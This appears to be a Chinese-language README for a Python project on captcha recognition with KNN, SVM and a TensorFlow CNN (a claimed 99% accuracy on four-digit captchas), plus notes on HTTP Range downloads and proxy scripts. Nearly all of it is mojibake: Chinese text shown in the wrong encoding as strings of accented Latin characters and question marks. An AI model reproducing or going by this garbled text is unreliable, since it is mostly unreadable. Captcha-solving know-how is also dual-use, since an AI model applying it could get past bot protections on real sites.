ç¯å¢ï¼python 2.7.14 , 模å?å?¯ä»¥èªå·±çä¸ py æä»¶ä»£ç ?ï¼pip install 䏿ç¨å°ç模å?
æ§è¡ï¼python get_proxy.py æå?å¾ç
æ§è¡ï¼python ocr_img.py 代ç?æ°æ?®è¯å«
éªè¯?ç ?è¯å«v1+HTTPå??è®®Rangeç¹æ§åæ?
Google æ?ç´¢ tesseract.js å符è¯å«
æ»ç»ææ¡£ï¼+ éªè¯?ç ?è¯å«v1+HTTPå??è®®Rangeç¹æ§åæ?.pdf
HTTPå??è®®Rangeç¹æ§åæ?(å¤çº¿ç¨æä»¶ä¸è½½å¨å®ç°):
åºäºæºå¨å¦ä¹ (TensorFlow)çå¤?æ?éªè¯?ç ?è¯å«
è¿?ç¨æºå¨å¦ä¹ ç®æ³æ¶ï¼å¦æä¸?ç?è§£å®ç°åç?ï¼å
奿¥å?£å
å®ç°åè½ï¼è¯å«ç®æ³æ¯éç¨çãä¸è¬å¤ç?ä¸?å?éªè¯?ç ?ï¼æä¸?å?çå¤ç?çç¥ã
åç±»ç®æ³ä¸¾ä¾ï¼ï¼å
·ä½ï¼https://github.com/LockGit/Pyï¼
01ï¼knn (kç¹é»è¿ç®æ³ï¼
02ï¼svmï¼æ¯æ?å?é?æºï¼å??åå¤?æ?ï¼
...
SVMç®æ³ç¸æ¯è¾KNNç®æ³æ?¥è¯´ï¼åç?ä¸è¦?å¤?æ?å¤?æ?çå¤ï¼SVMç®æ³åºæ¬æ?æ³æ¯ææ°æ?®è½¬å为ç¹ï¼
éè¿æç¹æ å°å°n维空é´ä¸ï¼éè¿n-1ç»´çè¶
å¹³é?¢åå²ï¼æ¾å°æä½³åå²è¶
å¹³é?¢ï¼
éè¿å¤æç¹å¨è¶
å¹³é?¢çåªä¸è¾¹ï¼æ?¥å¤æç¹å±äºåªä¸ç±»å符ã
åºäºæºå¨å¦ä¹ çéªè¯?ç ?è¯å«åæ¯æè¦?è¯å«ç对象å½å?ä¸ä¸ªæ´ä½ã
éæ©0-9纯æ°åï¼CNNç½ç»4*10个è¾åºï¼å¦ä¹ æ¶é´ï¼70åéï¼æ¨¡ååç¡®çï¼99%
éªè¯?ç ?颿µæªå¾:
æ»ç»ææ¡£ï¼+ åºäºæºå¨å¦ä¹ (TensorFlow)çå¤?æ?éªè¯?ç ?è¯å«.pdf